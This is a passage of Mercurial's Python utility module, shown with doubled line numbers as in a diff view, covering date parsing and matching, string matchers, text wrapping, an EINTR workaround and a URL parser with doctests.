2088 2088 if date == 'now' or date == _('now'):
2089 2089 return makedate()
2090 2090 if date == 'today' or date == _('today'):
2091 2091 date = datetime.date.today().strftime(r'%b %d')
2092 2092 date = encoding.strtolocal(date)
2093 2093 elif date == 'yesterday' or date == _('yesterday'):
2094 2094 date = (datetime.date.today() -
2095 2095 datetime.timedelta(days=1)).strftime(r'%b %d')
2096 2096 date = encoding.strtolocal(date)
2097 2097
2098 2098 try:
2099 2099 when, offset = map(int, date.split(' '))
2100 2100 except ValueError:
2101 2101 # fill out defaults
2102 2102 now = makedate()
2103 2103 defaults = {}
2104 2104 for part in ("d", "mb", "yY", "HI", "M", "S"):
2105 2105 # this piece is for rounding the specific end of unknowns
2106 2106 b = bias.get(part)
2107 2107 if b is None:
2108 2108 if part[0:1] in "HMS":
2109 2109 b = "00"
2110 2110 else:
2111 2111 b = "0"
2112 2112
2113 2113 # this piece is for matching the generic end to today's date
2114 2114 n = datestr(now, "%" + part[0:1])
2115 2115
2116 2116 defaults[part] = (b, n)
2117 2117
2118 2118 for format in formats:
2119 2119 try:
2120 2120 when, offset = strdate(date, format, defaults)
2121 2121 except (ValueError, OverflowError):
2122 2122 pass
2123 2123 else:
2124 2124 break
2125 2125 else:
2126 2126 raise error.ParseError(_('invalid date: %r') % date)
2127 2127 # validate explicit (probably user-specified) date and
2128 2128 # time zone offset. values must fit in signed 32 bits for
2129 2129 # current 32-bit linux runtimes. timezones go from UTC-12
2130 2130 # to UTC+14
2131 2131 if when < -0x80000000 or when > 0x7fffffff:
2132 2132 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2133 2133 if offset < -50400 or offset > 43200:
2134 2134 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2135 2135 return when, offset
2136 2136
2137 2137 def matchdate(date):
2138 2138 """Return a function that matches a given date match specifier
2139 2139
2140 2140 Formats include:
2141 2141
2142 2142 '{date}' match a given date to the accuracy provided
2143 2143
2144 2144 '<{date}' on or before a given date
2145 2145
2146 2146 '>{date}' on or after a given date
2147 2147
2148 2148 >>> p1 = parsedate(b"10:29:59")
2149 2149 >>> p2 = parsedate(b"10:30:00")
2150 2150 >>> p3 = parsedate(b"10:30:59")
2151 2151 >>> p4 = parsedate(b"10:31:00")
2152 2152 >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
2153 2153 >>> f = matchdate(b"10:30")
2154 2154 >>> f(p1[0])
2155 2155 False
2156 2156 >>> f(p2[0])
2157 2157 True
2158 2158 >>> f(p3[0])
2159 2159 True
2160 2160 >>> f(p4[0])
2161 2161 False
2162 2162 >>> f(p5[0])
2163 2163 False
2164 2164 """
2165 2165
2166 2166 def lower(date):
2167 2167 d = {'mb': "1", 'd': "1"}
2168 2168 return parsedate(date, extendeddateformats, d)[0]
2169 2169
2170 2170 def upper(date):
2171 2171 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2172 2172 for days in ("31", "30", "29"):
2173 2173 try:
2174 2174 d["d"] = days
2175 2175 return parsedate(date, extendeddateformats, d)[0]
2176 2176 except Abort:
2177 2177 pass
2178 2178 d["d"] = "28"
2179 2179 return parsedate(date, extendeddateformats, d)[0]
2180 2180
2181 2181 date = date.strip()
2182 2182
2183 2183 if not date:
2184 2184 raise Abort(_("dates cannot consist entirely of whitespace"))
2185 2185 elif date[0] == "<":
2186 2186 if not date[1:]:
2187 2187 raise Abort(_("invalid day spec, use '<DATE'"))
2188 2188 when = upper(date[1:])
2189 2189 return lambda x: x <= when
2190 2190 elif date[0] == ">":
2191 2191 if not date[1:]:
2192 2192 raise Abort(_("invalid day spec, use '>DATE'"))
2193 2193 when = lower(date[1:])
2194 2194 return lambda x: x >= when
2195 2195 elif date[0] == "-":
2196 2196 try:
2197 2197 days = int(date[1:])
2198 2198 except ValueError:
2199 2199 raise Abort(_("invalid day spec: %s") % date[1:])
2200 2200 if days < 0:
2201 2201 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2202 2202 % date[1:])
2203 2203 when = makedate()[0] - days * 3600 * 24
2204 2204 return lambda x: x >= when
2205 2205 elif " to " in date:
2206 2206 a, b = date.split(" to ")
2207 2207 start, stop = lower(a), upper(b)
2208 2208 return lambda x: x >= start and x <= stop
2209 2209 else:
2210 2210 start, stop = lower(date), upper(date)
2211 2211 return lambda x: x >= start and x <= stop
2212 2212
2213 2213 def stringmatcher(pattern, casesensitive=True):
2214 2214 """
2215 2215 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2216 2216 returns the matcher name, pattern, and matcher function.
2217 2217 missing or unknown prefixes are treated as literal matches.
2218 2218
2219 2219 helper for tests:
2220 2220 >>> def test(pattern, *tests):
2221 2221 ... kind, pattern, matcher = stringmatcher(pattern)
2222 2222 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2223 2223 >>> def itest(pattern, *tests):
2224 2224 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2225 2225 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2226 2226
2227 2227 exact matching (no prefix):
2228 2228 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2229 2229 ('literal', 'abcdefg', [False, False, True])
2230 2230
2231 2231 regex matching ('re:' prefix)
2232 2232 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2233 2233 ('re', 'a.+b', [False, False, True])
2234 2234
2235 2235 force exact matches ('literal:' prefix)
2236 2236 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2237 2237 ('literal', 're:foobar', [False, True])
2238 2238
2239 2239 unknown prefixes are ignored and treated as literals
2240 2240 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2241 2241 ('literal', 'foo:bar', [False, False, True])
2242 2242
2243 2243 case insensitive regex matches
2244 2244 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2245 2245 ('re', 'A.+b', [False, False, True])
2246 2246
2247 2247 case insensitive literal matches
2248 2248 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2249 2249 ('literal', 'ABCDEFG', [False, False, True])
2250 2250 """
2251 2251 if pattern.startswith('re:'):
2252 2252 pattern = pattern[3:]
2253 2253 try:
2254 2254 flags = 0
2255 2255 if not casesensitive:
2256 2256 flags = remod.I
2257 2257 regex = remod.compile(pattern, flags)
2258 2258 except remod.error as e:
2259 2259 raise error.ParseError(_('invalid regular expression: %s')
2260 2260 % e)
2261 2261 return 're', pattern, regex.search
2262 2262 elif pattern.startswith('literal:'):
2263 2263 pattern = pattern[8:]
2264 2264
2265 2265 match = pattern.__eq__
2266 2266
2267 2267 if not casesensitive:
2268 2268 ipat = encoding.lower(pattern)
2269 2269 match = lambda s: ipat == encoding.lower(s)
2270 2270 return 'literal', pattern, match
2271 2271
2272 2272 def shortuser(user):
2273 2273 """Return a short representation of a user name or email address."""
2274 2274 f = user.find('@')
2275 2275 if f >= 0:
2276 2276 user = user[:f]
2277 2277 f = user.find('<')
2278 2278 if f >= 0:
2279 2279 user = user[f + 1:]
2280 2280 f = user.find(' ')
2281 2281 if f >= 0:
2282 2282 user = user[:f]
2283 2283 f = user.find('.')
2284 2284 if f >= 0:
2285 2285 user = user[:f]
2286 2286 return user
2287 2287
2288 2288 def emailuser(user):
2289 2289 """Return the user portion of an email address."""
2290 2290 f = user.find('@')
2291 2291 if f >= 0:
2292 2292 user = user[:f]
2293 2293 f = user.find('<')
2294 2294 if f >= 0:
2295 2295 user = user[f + 1:]
2296 2296 return user
2297 2297
2298 2298 def email(author):
2299 2299 '''get email of author.'''
2300 2300 r = author.find('>')
2301 2301 if r == -1:
2302 2302 r = None
2303 2303 return author[author.find('<') + 1:r]
2304 2304
2305 2305 def ellipsis(text, maxlength=400):
2306 2306 """Trim string to at most maxlength (default: 400) columns in display."""
2307 2307 return encoding.trim(text, maxlength, ellipsis='...')
2308 2308
2309 2309 def unitcountfn(*unittable):
2310 2310 '''return a function that renders a readable count of some quantity'''
2311 2311
2312 2312 def go(count):
2313 2313 for multiplier, divisor, format in unittable:
2314 2314 if abs(count) >= divisor * multiplier:
2315 2315 return format % (count / float(divisor))
2316 2316 return unittable[-1][2] % count
2317 2317
2318 2318 return go
2319 2319
2320 2320 def processlinerange(fromline, toline):
2321 2321 """Check that linerange <fromline>:<toline> makes sense and return a
2322 2322 0-based range.
2323 2323
2324 2324 >>> processlinerange(10, 20)
2325 2325 (9, 20)
2326 2326 >>> processlinerange(2, 1)
2327 2327 Traceback (most recent call last):
2328 2328 ...
2329 2329 ParseError: line range must be positive
2330 2330 >>> processlinerange(0, 5)
2331 2331 Traceback (most recent call last):
2332 2332 ...
2333 2333 ParseError: fromline must be strictly positive
2334 2334 """
2335 2335 if toline - fromline < 0:
2336 2336 raise error.ParseError(_("line range must be positive"))
2337 2337 if fromline < 1:
2338 2338 raise error.ParseError(_("fromline must be strictly positive"))
2339 2339 return fromline - 1, toline
2340 2340
2341 2341 bytecount = unitcountfn(
2342 2342 (100, 1 << 30, _('%.0f GB')),
2343 2343 (10, 1 << 30, _('%.1f GB')),
2344 2344 (1, 1 << 30, _('%.2f GB')),
2345 2345 (100, 1 << 20, _('%.0f MB')),
2346 2346 (10, 1 << 20, _('%.1f MB')),
2347 2347 (1, 1 << 20, _('%.2f MB')),
2348 2348 (100, 1 << 10, _('%.0f KB')),
2349 2349 (10, 1 << 10, _('%.1f KB')),
2350 2350 (1, 1 << 10, _('%.2f KB')),
2351 2351 (1, 1, _('%.0f bytes')),
2352 2352 )
2353 2353
2354 2354 # Matches a single EOL which can either be a CRLF where repeated CR
2355 2355 # are removed or a LF. We do not care about old Macintosh files, so a
2356 2356 # stray CR is an error.
2357 2357 _eolre = remod.compile(br'\r*\n')
2358 2358
2359 2359 def tolf(s):
2360 2360 return _eolre.sub('\n', s)
2361 2361
2362 2362 def tocrlf(s):
2363 2363 return _eolre.sub('\r\n', s)
2364 2364
2365 2365 if pycompat.oslinesep == '\r\n':
2366 2366 tonativeeol = tocrlf
2367 2367 fromnativeeol = tolf
2368 2368 else:
2369 2369 tonativeeol = pycompat.identity
2370 2370 fromnativeeol = pycompat.identity
2371 2371
2372 2372 def escapestr(s):
2373 2373 # call underlying function of s.encode('string_escape') directly for
2374 2374 # Python 3 compatibility
2375 2375 return codecs.escape_encode(s)[0]
2376 2376
2377 2377 def unescapestr(s):
2378 2378 return codecs.escape_decode(s)[0]
2379 2379
2380 2380 def forcebytestr(obj):
2381 2381 """Portably format an arbitrary object (e.g. exception) into a byte
2382 2382 string."""
2383 2383 try:
2384 2384 return pycompat.bytestr(obj)
2385 2385 except UnicodeEncodeError:
2386 2386 # non-ascii string, may be lossy
2387 2387 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2388 2388
2389 2389 def uirepr(s):
2390 2390 # Avoid double backslash in Windows path repr()
2391 2391 return repr(s).replace('\\\\', '\\')
2392 2392
2393 2393 # delay import of textwrap
2394 2394 def MBTextWrapper(**kwargs):
2395 2395 class tw(textwrap.TextWrapper):
2396 2396 """
2397 2397 Extend TextWrapper for width-awareness.
2398 2398
2399 2399 Neither number of 'bytes' in any encoding nor 'characters' is
2400 2400 appropriate to calculate terminal columns for specified string.
2401 2401
2402 2402 Original TextWrapper implementation uses built-in 'len()' directly,
2403 2403 so overriding is needed to use width information of each characters.
2404 2404
2405 2405 In addition, characters classified into 'ambiguous' width are
2406 2406 treated as wide in East Asian area, but as narrow in other.
2407 2407
2408 2408 This requires use decision to determine width of such characters.
2409 2409 """
2410 2410 def _cutdown(self, ucstr, space_left):
2411 2411 l = 0
2412 2412 colwidth = encoding.ucolwidth
2413 2413 for i in xrange(len(ucstr)):
2414 2414 l += colwidth(ucstr[i])
2415 2415 if space_left < l:
2416 2416 return (ucstr[:i], ucstr[i:])
2417 2417 return ucstr, ''
2418 2418
2419 2419 # overriding of base class
2420 2420 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2421 2421 space_left = max(width - cur_len, 1)
2422 2422
2423 2423 if self.break_long_words:
2424 2424 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2425 2425 cur_line.append(cut)
2426 2426 reversed_chunks[-1] = res
2427 2427 elif not cur_line:
2428 2428 cur_line.append(reversed_chunks.pop())
2429 2429
2430 2430 # this overriding code is imported from TextWrapper of Python 2.6
2431 2431 # to calculate columns of string by 'encoding.ucolwidth()'
2432 2432 def _wrap_chunks(self, chunks):
2433 2433 colwidth = encoding.ucolwidth
2434 2434
2435 2435 lines = []
2436 2436 if self.width <= 0:
2437 2437 raise ValueError("invalid width %r (must be > 0)" % self.width)
2438 2438
2439 2439 # Arrange in reverse order so items can be efficiently popped
2440 2440 # from a stack of chucks.
2441 2441 chunks.reverse()
2442 2442
2443 2443 while chunks:
2444 2444
2445 2445 # Start the list of chunks that will make up the current line.
2446 2446 # cur_len is just the length of all the chunks in cur_line.
2447 2447 cur_line = []
2448 2448 cur_len = 0
2449 2449
2450 2450 # Figure out which static string will prefix this line.
2451 2451 if lines:
2452 2452 indent = self.subsequent_indent
2453 2453 else:
2454 2454 indent = self.initial_indent
2455 2455
2456 2456 # Maximum width for this line.
2457 2457 width = self.width - len(indent)
2458 2458
2459 2459 # First chunk on line is whitespace -- drop it, unless this
2460 2460 # is the very beginning of the text (i.e. no lines started yet).
2461 2461 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2462 2462 del chunks[-1]
2463 2463
2464 2464 while chunks:
2465 2465 l = colwidth(chunks[-1])
2466 2466
2467 2467 # Can at least squeeze this chunk onto the current line.
2468 2468 if cur_len + l <= width:
2469 2469 cur_line.append(chunks.pop())
2470 2470 cur_len += l
2471 2471
2472 2472 # Nope, this line is full.
2473 2473 else:
2474 2474 break
2475 2475
2476 2476 # The current line is full, and the next chunk is too big to
2477 2477 # fit on *any* line (not just this one).
2478 2478 if chunks and colwidth(chunks[-1]) > width:
2479 2479 self._handle_long_word(chunks, cur_line, cur_len, width)
2480 2480
2481 2481 # If the last chunk on this line is all whitespace, drop it.
2482 2482 if (self.drop_whitespace and
2483 2483 cur_line and cur_line[-1].strip() == r''):
2484 2484 del cur_line[-1]
2485 2485
2486 2486 # Convert current line back to a string and store it in list
2487 2487 # of all lines (return value).
2488 2488 if cur_line:
2489 2489 lines.append(indent + r''.join(cur_line))
2490 2490
2491 2491 return lines
2492 2492
2493 2493 global MBTextWrapper
2494 2494 MBTextWrapper = tw
2495 2495 return tw(**kwargs)
2496 2496
2497 2497 def wrap(line, width, initindent='', hangindent=''):
2498 2498 maxindent = max(len(hangindent), len(initindent))
2499 2499 if width <= maxindent:
2500 2500 # adjust for weird terminal size
2501 2501 width = max(78, maxindent + 1)
2502 2502 line = line.decode(pycompat.sysstr(encoding.encoding),
2503 2503 pycompat.sysstr(encoding.encodingmode))
2504 2504 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2505 2505 pycompat.sysstr(encoding.encodingmode))
2506 2506 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2507 2507 pycompat.sysstr(encoding.encodingmode))
2508 2508 wrapper = MBTextWrapper(width=width,
2509 2509 initial_indent=initindent,
2510 2510 subsequent_indent=hangindent)
2511 2511 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2512 2512
2513 2513 if (pyplatform.python_implementation() == 'CPython' and
2514 2514 sys.version_info < (3, 0)):
2515 2515 # There is an issue in CPython that some IO methods do not handle EINTR
2516 2516 # correctly. The following table shows what CPython version (and functions)
2517 2517 # are affected (buggy: has the EINTR bug, okay: otherwise):
2518 2518 #
2519 2519 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2520 2520 # --------------------------------------------------
2521 2521 # fp.__iter__ | buggy | buggy | okay
2522 2522 # fp.read* | buggy | okay [1] | okay
2523 2523 #
2524 2524 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2525 2525 #
2526 2526 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2527 2527 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2528 2528 #
2529 2529 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2530 2530 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2531 2531 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2532 2532 # fp.__iter__ but not other fp.read* methods.
2533 2533 #
2534 2534 # On modern systems like Linux, the "read" syscall cannot be interrupted
2535 2535 # when reading "fast" files like on-disk files. So the EINTR issue only
2536 2536 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2537 2537 # files approximately as "fast" files and use the fast (unsafe) code path,
2538 2538 # to minimize the performance impact.
2539 2539 if sys.version_info >= (2, 7, 4):
2540 2540 # fp.readline deals with EINTR correctly, use it as a workaround.
2541 2541 def _safeiterfile(fp):
2542 2542 return iter(fp.readline, '')
2543 2543 else:
2544 2544 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2545 2545 # note: this may block longer than necessary because of bufsize.
2546 2546 def _safeiterfile(fp, bufsize=4096):
2547 2547 fd = fp.fileno()
2548 2548 line = ''
2549 2549 while True:
2550 2550 try:
2551 2551 buf = os.read(fd, bufsize)
2552 2552 except OSError as ex:
2553 2553 # os.read only raises EINTR before any data is read
2554 2554 if ex.errno == errno.EINTR:
2555 2555 continue
2556 2556 else:
2557 2557 raise
2558 2558 line += buf
2559 2559 if '\n' in buf:
2560 2560 splitted = line.splitlines(True)
2561 2561 line = ''
2562 2562 for l in splitted:
2563 2563 if l[-1] == '\n':
2564 2564 yield l
2565 2565 else:
2566 2566 line = l
2567 2567 if not buf:
2568 2568 break
2569 2569 if line:
2570 2570 yield line
2571 2571
2572 2572 def iterfile(fp):
2573 2573 fastpath = True
2574 2574 if type(fp) is file:
2575 2575 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2576 2576 if fastpath:
2577 2577 return fp
2578 2578 else:
2579 2579 return _safeiterfile(fp)
2580 2580 else:
2581 2581 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2582 2582 def iterfile(fp):
2583 2583 return fp
2584 2584
2585 2585 def iterlines(iterator):
2586 2586 for chunk in iterator:
2587 2587 for line in chunk.splitlines():
2588 2588 yield line
2589 2589
2590 2590 def expandpath(path):
2591 2591 return os.path.expanduser(os.path.expandvars(path))
2592 2592
2593 2593 def hgcmd():
2594 2594 """Return the command used to execute current hg
2595 2595
2596 2596 This is different from hgexecutable() because on Windows we want
2597 2597 to avoid things opening new shell windows like batch files, so we
2598 2598 get either the python call or current executable.
2599 2599 """
2600 2600 if mainfrozen():
2601 2601 if getattr(sys, 'frozen', None) == 'macosx_app':
2602 2602 # Env variable set by py2app
2603 2603 return [encoding.environ['EXECUTABLEPATH']]
2604 2604 else:
2605 2605 return [pycompat.sysexecutable]
2606 2606 return gethgcmd()
2607 2607
2608 2608 def rundetached(args, condfn):
2609 2609 """Execute the argument list in a detached process.
2610 2610
2611 2611 condfn is a callable which is called repeatedly and should return
2612 2612 True once the child process is known to have started successfully.
2613 2613 At this point, the child process PID is returned. If the child
2614 2614 process fails to start or finishes before condfn() evaluates to
2615 2615 True, return -1.
2616 2616 """
2617 2617 # Windows case is easier because the child process is either
2618 2618 # successfully starting and validating the condition or exiting
2619 2619 # on failure. We just poll on its PID. On Unix, if the child
2620 2620 # process fails to start, it will be left in a zombie state until
2621 2621 # the parent wait on it, which we cannot do since we expect a long
2622 2622 # running process on success. Instead we listen for SIGCHLD telling
2623 2623 # us our child process terminated.
2624 2624 terminated = set()
2625 2625 def handler(signum, frame):
2626 2626 terminated.add(os.wait())
2627 2627 prevhandler = None
2628 2628 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2629 2629 if SIGCHLD is not None:
2630 2630 prevhandler = signal.signal(SIGCHLD, handler)
2631 2631 try:
2632 2632 pid = spawndetached(args)
2633 2633 while not condfn():
2634 2634 if ((pid in terminated or not testpid(pid))
2635 2635 and not condfn()):
2636 2636 return -1
2637 2637 time.sleep(0.1)
2638 2638 return pid
2639 2639 finally:
2640 2640 if prevhandler is not None:
2641 2641 signal.signal(signal.SIGCHLD, prevhandler)
2642 2642
2643 2643 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2644 2644 """Return the result of interpolating items in the mapping into string s.
2645 2645
2646 2646 prefix is a single character string, or a two character string with
2647 2647 a backslash as the first character if the prefix needs to be escaped in
2648 2648 a regular expression.
2649 2649
2650 2650 fn is an optional function that will be applied to the replacement text
2651 2651 just before replacement.
2652 2652
2653 2653 escape_prefix is an optional flag that allows using doubled prefix for
2654 2654 its escaping.
2655 2655 """
2656 2656 fn = fn or (lambda s: s)
2657 2657 patterns = '|'.join(mapping.keys())
2658 2658 if escape_prefix:
2659 2659 patterns += '|' + prefix
2660 2660 if len(prefix) > 1:
2661 2661 prefix_char = prefix[1:]
2662 2662 else:
2663 2663 prefix_char = prefix
2664 2664 mapping[prefix_char] = prefix_char
2665 2665 r = remod.compile(r'%s(%s)' % (prefix, patterns))
2666 2666 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2667 2667
2668 2668 def getport(port):
2669 2669 """Return the port for a given network service.
2670 2670
2671 2671 If port is an integer, it's returned as is. If it's a string, it's
2672 2672 looked up using socket.getservbyname(). If there's no matching
2673 2673 service, error.Abort is raised.
2674 2674 """
2675 2675 try:
2676 2676 return int(port)
2677 2677 except ValueError:
2678 2678 pass
2679 2679
2680 2680 try:
2681 2681 return socket.getservbyname(port)
2682 2682 except socket.error:
2683 2683 raise Abort(_("no port number associated with service '%s'") % port)
2684 2684
2685 2685 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2686 2686 '0': False, 'no': False, 'false': False, 'off': False,
2687 2687 'never': False}
2688 2688
2689 2689 def parsebool(s):
2690 2690 """Parse s into a boolean.
2691 2691
2692 2692 If s is not a valid boolean, returns None.
2693 2693 """
2694 2694 return _booleans.get(s.lower(), None)
2695 2695
2696 2696 _hextochr = dict((a + b, chr(int(a + b, 16)))
2697 2697 for a in string.hexdigits for b in string.hexdigits)
2698 2698
2699 2699 class url(object):
2700 2700 r"""Reliable URL parser.
2701 2701
2702 2702 This parses URLs and provides attributes for the following
2703 2703 components:
2704 2704
2705 2705 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2706 2706
2707 2707 Missing components are set to None. The only exception is
2708 2708 fragment, which is set to '' if present but empty.
2709 2709
2710 2710 If parsefragment is False, fragment is included in query. If
2711 2711 parsequery is False, query is included in path. If both are
2712 2712 False, both fragment and query are included in path.
2713 2713
2714 2714 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2715 2715
2716 2716 Note that for backward compatibility reasons, bundle URLs do not
2717 2717 take host names. That means 'bundle://../' has a path of '../'.
2718 2718
2719 2719 Examples:
2720 2720
2721 2721 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2722 2722 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2723 2723 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2724 2724 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2725 2725 >>> url(b'file:///home/joe/repo')
2726 2726 <url scheme: 'file', path: '/home/joe/repo'>
2727 2727 >>> url(b'file:///c:/temp/foo/')
2728 2728 <url scheme: 'file', path: 'c:/temp/foo/'>
2729 2729 >>> url(b'bundle:foo')
2730 2730 <url scheme: 'bundle', path: 'foo'>
2731 2731 >>> url(b'bundle://../foo')
2732 2732 <url scheme: 'bundle', path: '../foo'>
2733 2733 >>> url(br'c:\foo\bar')
2734 2734 <url path: 'c:\\foo\\bar'>
2735 2735 >>> url(br'\\blah\blah\blah')
2736 2736 <url path: '\\\\blah\\blah\\blah'>
2737 2737 >>> url(br'\\blah\blah\blah#baz')
2738 2738 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2739 2739 >>> url(br'file:///C:\users\me')
2740 2740 <url scheme: 'file', path: 'C:\\users\\me'>
2741 2741
2742 2742 Authentication credentials:
2743 2743
2744 2744 >>> url(b'ssh://joe:xyz@x/repo')
2745 2745 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2746 2746 >>> url(b'ssh://joe@x/repo')
2747 2747 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2748 2748
2749 2749 Query strings and fragments:
2750 2750
2751 2751 >>> url(b'http://host/a?b#c')
2752 2752 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2753 2753 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2754 2754 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2755 2755
2756 2756 Empty path:
2757 2757
2758 2758 >>> url(b'')
2759 2759 <url path: ''>
2760 2760 >>> url(b'#a')
2761 2761 <url path: '', fragment: 'a'>
2762 2762 >>> url(b'http://host/')
2763 2763 <url scheme: 'http', host: 'host', path: ''>
2764 2764 >>> url(b'http://host/#a')
2765 2765 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2766 2766
2767 2767 Only scheme:
2768 2768
2769 2769 >>> url(b'http:')
2770 2770 <url scheme: 'http'>
2771 2771 """
2772 2772
2773 2773 _safechars = "!~*'()+"
2774 2774 _safepchars = "/!~*'()+:\\"
2775 2775 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2776 2776
2777 2777 def __init__(self, path, parsequery=True, parsefragment=True):
2778 2778 # We slowly chomp away at path until we have only the path left
2779 2779 self.scheme = self.user = self.passwd = self.host = None
2780 2780 self.port = self.path = self.query = self.fragment = None
2781 2781 self._localpath = True
2782 2782 self._hostport = ''
2783 2783 self._origpath = path
2784 2784
2785 2785 if parsefragment and '#' in path:
2786 2786 path, self.fragment = path.split('#', 1)
2787 2787
2788 2788 # special case for Windows drive letters and UNC paths
2789 2789 if hasdriveletter(path) or path.startswith('\\\\'):
2790 2790 self.path = path
2791 2791 return
2792 2792
2793 2793 # For compatibility reasons, we can't handle bundle paths as
2794 2794 # normal URLS
2795 2795 if path.startswith('bundle:'):
2796 2796 self.scheme = 'bundle'
2797 2797 path = path[7:]
2798 2798 if path.startswith('//'):
2799 2799 path = path[2:]
2800 2800 self.path = path
2801 2801 return
2802 2802
2803 2803 if self._matchscheme(path):
2804 2804 parts = path.split(':', 1)
2805 2805 if parts[0]:
2806 2806 self.scheme, path = parts
2807 2807 self._localpath = False
2808 2808
2809 2809 if not path:
2810 2810 path = None
2811 2811 if self._localpath:
2812 2812 self.path = ''
2813 2813 return
2814 2814 else:
2815 2815 if self._localpath:
2816 2816 self.path = path
2817 2817 return
2818 2818
2819 2819 if parsequery and '?' in path:
2820 2820 path, self.query = path.split('?', 1)
2821 2821 if not path:
2822 2822 path = None
2823 2823 if not self.query:
2824 2824 self.query = None
2825 2825
2826 2826 # // is required to specify a host/authority
2827 2827 if path and path.startswith('//'):
2828 2828 parts = path[2:].split('/', 1)
2829 2829 if len(parts) > 1:
2830 2830 self.host, path = parts
2831 2831 else:
2832 2832 self.host = parts[0]
2833 2833 path = None
2834 2834 if not self.host:
2835 2835 self.host = None
2836 2836 # path of file:///d is /d
2837 2837 # path of file:///d:/ is d:/, not /d:/
2838 2838 if path and not hasdriveletter(path):
2839 2839 path = '/' + path
2840 2840
2841 2841 if self.host and '@' in self.host:
2842 2842 self.user, self.host = self.host.rsplit('@', 1)
2843 2843 if ':' in self.user:
2844 2844 self.user, self.passwd = self.user.split(':', 1)
2845 2845 if not self.host:
2846 2846 self.host = None
2847 2847
2848 2848 # Don't split on colons in IPv6 addresses without ports
2849 2849 if (self.host and ':' in self.host and
2850 2850 not (self.host.startswith('[') and self.host.endswith(']'))):
2851 2851 self._hostport = self.host
2852 2852 self.host, self.port = self.host.rsplit(':', 1)
2853 2853 if not self.host:
2854 2854 self.host = None
2855 2855
2856 2856 if (self.host and self.scheme == 'file' and
2857 2857 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2858 2858 raise Abort(_('file:// URLs can only refer to localhost'))
2859 2859
2860 2860 self.path = path
2861 2861
2862 2862 # leave the query string escaped
2863 2863 for a in ('user', 'passwd', 'host', 'port',
2864 2864 'path', 'fragment'):
2865 2865 v = getattr(self, a)
2866 2866 if v is not None:
2867 2867 setattr(self, a, urlreq.unquote(v))
2868 2868
2869 2869 @encoding.strmethod
2870 2870 def __repr__(self):
2871 2871 attrs = []
2872 2872 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2873 2873 'query', 'fragment'):
2874 2874 v = getattr(self, a)
2875 2875 if v is not None:
2876 2876 attrs.append('%s: %r' % (a, v))
2877 2877 return '<url %s>' % ', '.join(attrs)
2878 2878
2879 2879 def __bytes__(self):
2880 2880 r"""Join the URL's components back into a URL string.
2881 2881
2882 2882 Examples:
2883 2883
2884 2884 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2885 2885 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2886 2886 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2887 2887 'http://user:pw@host:80/?foo=bar&baz=42'
2888 2888 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2889 2889 'http://user:pw@host:80/?foo=bar%3dbaz'
2890 2890 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2891 2891 'ssh://user:pw@[::1]:2200//home/joe#'
2892 2892 >>> bytes(url(b'http://localhost:80//'))
2893 2893 'http://localhost:80//'
2894 2894 >>> bytes(url(b'http://localhost:80/'))
2895 2895 'http://localhost:80/'
2896 2896 >>> bytes(url(b'http://localhost:80'))
2897 2897 'http://localhost:80/'
2898 2898 >>> bytes(url(b'bundle:foo'))
2899 2899 'bundle:foo'
